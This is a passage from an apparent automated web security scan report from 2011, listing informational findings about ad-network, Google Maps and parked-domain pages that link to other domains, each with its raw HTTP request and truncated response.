User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 11:40:24 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 3600

<html><head><style></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/%253Finline%253Dnyt-classifier%26hl%3Den%26client%3Dca-nytimes_display_html%26adU%3Dwww.forsalebyowner.com%26adT%3DImageAd%26gl%3DUS%26hideleadgen%3D1&usg=AFQjCNGTPrDqWM6BX9J08BYJD4g1Qryo8w" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.21. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-nytimes_display_html&format=728x90_pas_abgc&output=html&h=90&w=728&lmt=1305216969&channel=Topics_leaderboard&ad_type=image&alternate_ad_url=http%3A%2F%2Fwww.nytimes.com%2Fads%2Fremnant%2Fnetworkredirect-leaderboard.html&oe=utf8&flash=10.2.154&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Fsubjects%2Fp%2Fprivate_equity%2Findex.html%3Finline%3Dnyt-classifier&adsafe=high&targeting=site_content&dt=1305198969022&bpp=2&shv=r20110427&jsv=r20110427&correlator=1305198969026&frm=0&adk=2225227735&ga_vid=1802707015.1305198969&ga_sid=1305198969&ga_hid=556056449&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1030&bih=964&fu=0&ifi=1&dtd=114&xpc=gLROVOgUps&p=http%3A//topics.nytimes.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/%253Finline%253Dnyt-classifier%26hl%3Den%26client%3Dca-nytimes_display_html%26adU%3DXactlyCorp.com%26adT%3DImageAd%26gl%3DUS%26hideleadgen%3D1&usg=AFQjCNEN9oqZ9N8fHWQKaoASV4oe55aOlg

Request

GET /pagead/ads?client=ca-nytimes_display_html&format=728x90_pas_abgc&output=html&h=90&w=728&lmt=1305216969&channel=Topics_leaderboard&ad_type=image&alternate_ad_url=http%3A%2F%2Fwww.nytimes.com%2Fads%2Fremnant%2Fnetworkredirect-leaderboard.html&oe=utf8&flash=10.2.154&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Fsubjects%2Fp%2Fprivate_equity%2Findex.html%3Finline%3Dnyt-classifier&adsafe=high&targeting=site_content&dt=1305198969022&bpp=2&shv=r20110427&jsv=r20110427&correlator=1305198969026&frm=0&adk=2225227735&ga_vid=1802707015.1305198969&ga_sid=1305198969&ga_hid=556056449&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1030&bih=964&fu=0&ifi=1&dtd=114&xpc=gLROVOgUps&p=http%3A//topics.nytimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 11:16:11 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 3592

<html><head><style></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/%253Finline%253Dnyt-classifier%26hl%3Den%26client%3Dca-nytimes_display_html%26adU%3DXactlyCorp.com%26adT%3DImageAd%26gl%3DUS%26hideleadgen%3D1&usg=AFQjCNEN9oqZ9N8fHWQKaoASV4oe55aOlg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.22. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f

The response contains the following link to another domain:

http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/x;240687484;0-0;0;22018236;4307-300/250;41199286/41217073/1;u=10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;~okv=;comp=;s1=markets;s2=;pos=frame1;ctype=front;ptype=article;url=markets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_;m1=recession;m2=henry-kravis;m3=rjr-nabisco;m4=junk-bonds;m5=padma-lakshmi;rs=10428;qc=D;qc=T;qc=3995;qc=921;qc=922;qc=928;qc=929;qc=3994;sz=300x250,336x280;tile=2;u=10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;!c=;~aopt=2/1/9e/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/15917-119013-26745-9?mpt=4107592

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:21 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6772
Content-Type: application/x-javascript

(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/x;240687484;0-0;0;22018236;4307-300/250;41199286/41217073/1;u=10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;~okv=;comp=;s1=markets;s2=;pos=frame1;ctype=front;ptype=article;url=markets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_;m1=recession;m2=henry-kravis;m3=rjr-nabisco;m4=junk-bonds;m5=padma-lakshmi;rs=10428;qc=D;qc=T;qc=3995;qc=921;qc=922;qc=928;qc=929;qc=3994;sz=300x250,336x280;tile=2;u=10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;!c=;~aopt=2/1/9e/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/15917-119013-26745-9?mpt=4107592" target="_blank"><img src="http://img-cdn.mediaplex.com/0/15917/119013/OD_Promises_Domestic_300x250.jpg" width="300" height="250" border="0" alt="">
...[SNIP]...

19.23. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The page was loaded from a URL containing a query string:

http://maps.google.com/maps?hl=en&source=hp&q=530+Virginia+Road+P.O.+Box+9133+Concord,+Massachusetts&ie=UTF8&hq=&hnear=530+Virginia+Rd,+Concord,+Middlesex,+Massachusetts+01742&z=14&iwloc=r10&ll=42.476402,-71.298008&output=embed

The response contains the following links to other domains:

http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png
http://maps.gstatic.com/mapfiles/poweredby.png
http://maps.gstatic.com/mapfiles/smc.png
http://maps.gstatic.com/mapfiles/transparent.png

Request

GET /maps?hl=en&source=hp&q=530+Virginia+Road+P.O.+Box+9133+Concord,+Massachusetts&ie=UTF8&hq=&hnear=530+Virginia+Rd,+Concord,+Middlesex,+Massachusetts+01742&z=14&iwloc=r10&ll=42.476402,-71.298008&output=embed HTTP/1.1
Host: maps.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/contact_us/index
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Date: Thu, 12 May 2011 12:27:52 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Content-Length: 138530

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/smc.png"/> <div class="smcpanup" id="pan_up_inline" jsaction="smc.selectPanUp">
...[SNIP]...
</div> <img class="hide-msie-6 logo" src="http://maps.gstatic.com/mapfiles/poweredby.png"/> </a>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div class="dir-tm" style="visibility:" id="travel_modes_div"> <img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/><a jsfor="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'A'" jstrack="SNLLTaXOGaTqzgWP7533CQ" ved=0CAkQ_gswAA id="marker_A_1"><img alt="A" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconA"/></div>
...[SNIP]...

19.24. http://pepperhamilton.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pepperhamilton.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA

The response contains the following links to other domains:

http://cdn.dsultra.com/css/0/landing/en.css
http://cdn.dsultra.com/css/785/landing/en.css
http://cdn.dsultra.com/favicon/mi_favicon.ico
http://cdn.dsultra.com/t/privacy_ds.htm
http://domdex.com/f?c=107&k=find lawyers in your area
http://p.chango.com/p.js

Request

Response

HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=99
P3P: policyref="http://www.dsnextgen.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: ident=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1305201705%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Ayzustqxtwswvrsr; path=/; expires=Fri, 13-May-2011 12:01:45 GMT
Set-Cookie: pepperhamilton.com=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1305201705%7Cclick%3A0%7Cblocked%3A0; path=/; expires=Fri, 13-May-2011 12:01:45 GMT
Set-Cookie: Spusr=3c0015ac4dd84dcbcc2919f5; path=/; expires=Sat, 11-May-2013 12:01:45 GMT
Content-Length: 51485

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head> <title> pepperhamilton.com </title>
<meta http-equiv="Keywords"
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<link rel="shortcut icon" href="http://cdn.dsultra.com/favicon/mi_favicon.ico" type="image/x-icon">
<script type="text/javascript">
...[SNIP]...
</script>

<link rel="stylesheet" href="http://cdn.dsultra.com/css/0/landing/en.css" type="text/css">

<link rel="stylesheet" href="http://cdn.dsultra.com/css/785/landing/en.css" type="text/css">


...[SNIP]...
<span class="footer_privacy_section">
<a href="http://cdn.dsultra.com/t/privacy_ds.htm" target="privacy_pepperhamilton_com">Privacy Policy</a>
...[SNIP]...
</script>

<iframe src='http://domdex.com/f?c=107&k=find lawyers in your area' width=0 height=0 frameborder=0></iframe>
...[SNIP]...
</script> <script type="text/javascript" src="http://p.chango.com/p.js"></script>
...[SNIP]...

19.25. http://pixel.invitemedia.com/admeld_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/admeld_sync

Issue detail

The page was loaded from a URL containing a query string:

http://pixel.invitemedia.com/admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1305632367&custom_user_segments=%2C11265%2C17154%2C49027%2C59012%2C50056%2C50185%2C17163%2C50060%2C49026%2C50064%2C4625%2C45714%2C10478%2C10518%2C6551%2C48153%2C48156%2C48157%2C10656%2C14769%2C24493%2C10672%2C8%2C38582%2C48201%2C23864%2C57145%2C57148%2C30653%2C10504%2C10047%2C17857%2C41538%2C13893%2C55494%2C45639%2C45640%2C1097%2C56778%2C13899%2C30354%2C18125%2C13902%2C51919%2C48080%2C18129%2C10068%2C39944%2C53433%2C26724%2C50398%2C30304%2C24420%2C1073%2C40657%2C56808%2C58364%2C39531%2C56813%2C57454%2C10480%2C1150%2C58870%2C40809%2C59007%2C39804%2C11262%2C9855

Request

GET /admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; dp_rec="{\"1\": 1304954972+ \"3\": 1305125819+ \"2\": 1304949608+ \"5\": 1304954981+ \"4\": 1304954975}"; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"594286\": [1305035434+ \"2214981f-6ad1-347f-b68c-65cac0743543\"+ 140741+ 69733+ 139]+ \"423816\": [1305035840+ \"562254c9-5bb8-3476-9992-adb6207f4e32\"+ 144852+ 85665+ 227]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"591269\": [1305125830+ \"TcqjuAAEHsEK5XEIPxlByw==\"+ 62899+ 25126+ 8064]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619519\": [1305033320+ \"8188923508912701641\"+ 4451+ 6017+ 1201]+ \"628850\": [1305126069+ \"57c14386-864e-359d-8fb4-c32422e3a406\"+ 11349+ 57595+ 3180]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"619681\": [1305033339+ \"7307077377628671859\"+ 4451+ 6017+ 1201]+ \"50347\": [1305034714+ \"f2cf7655-4055-39ab-b4a3-d0ded4a34a06\"+ 44698+ 62225+ 139]+ \"581293\": [1305035906+ \"99b5fa1e-4f3e-370e-924a-24b5b9838ca0\"+ 140741+ 69733+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"581049\": [1305035636+ \"5de90a2a-d278-31ea-a24a-0c203fa41504\"+ 140741+ 69733+ 227]}"; camp_freq_p1="eJzjkuG48plFgFli68lV71gUGDU+gmgDRgswn0uG4xVY9thxiOy5qxBZMJ9LgmP+YlYBRommzqVg2aZ/J4GyDBYMQJnpH5mBMgc6IDIHPm6By/xdBNLzpQ0i8+U3TI8IR8dGkMyqVpAMgwYDWFSY440zUPDW/yVIgiIcK8+yAp31+wuq6BSgKJPECzTRCx+YgKKPJyxAEf3+DeTA/8/mo4jOvgESfY4meu8AyNwtF369RRZdMR/k3Ml9p1FEd94HmTBr/lqEKADut2xQ"; io_freq_p1="eJzjkuY4HijAJrH15Kp3LAqMGh9BtAGTxbHjQJpLmONNqACjRFPnUqAkgwaDAYMFA1DwqytQ8EAHquATkMovbaiCXeFAwVWtqIIvhYGCt/4vQRG8GiHALPH7C6rgmkgBJokXaIK7rYGCjycsQBFc4AIU/P9sPorgeleg4JYLv94iC24DuXNy32kUwb0uQMFZ89ciBAEFMUmn"; segments_p1="eJwdUM1KAlEYZe6dxeWu5iF6g14jAnVRD+GuJ+gHG7GghIygoB5AcCBEGx0rLDMzFVoFRcH0n2OrciFO59zN4Xw/55zvXi1VIalttdaVWqrDFOAijdpdl1qrWiCdz1ovstHJvwjgWc4ChoGF6aQsHP/t1UxboYB0ugC6BamtfjvE/TFF0Sn5pEXMugxqK9CDMTXbM7CqIujhvgkroTi6CqmrHlEx2GSkW+Hy8iLgNg3o8MrKCUcrGWJ9ROxiWardWdCvY3q8+8yLEgBvCfXQp2fb3JUfUrJnzvAYuxqzfelREs/R2jTiG2qevmn9kwD9CNjeMA+99vlT5aJwSs/BiH8R9mnb2+G0/8fN8yYj3CSglEKdy9BqysjHLMMa83xonVt3pMWG9Q/+LG7L"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 12 May 2011 11:39:27 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 12-May-2011 11:39:07 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 737

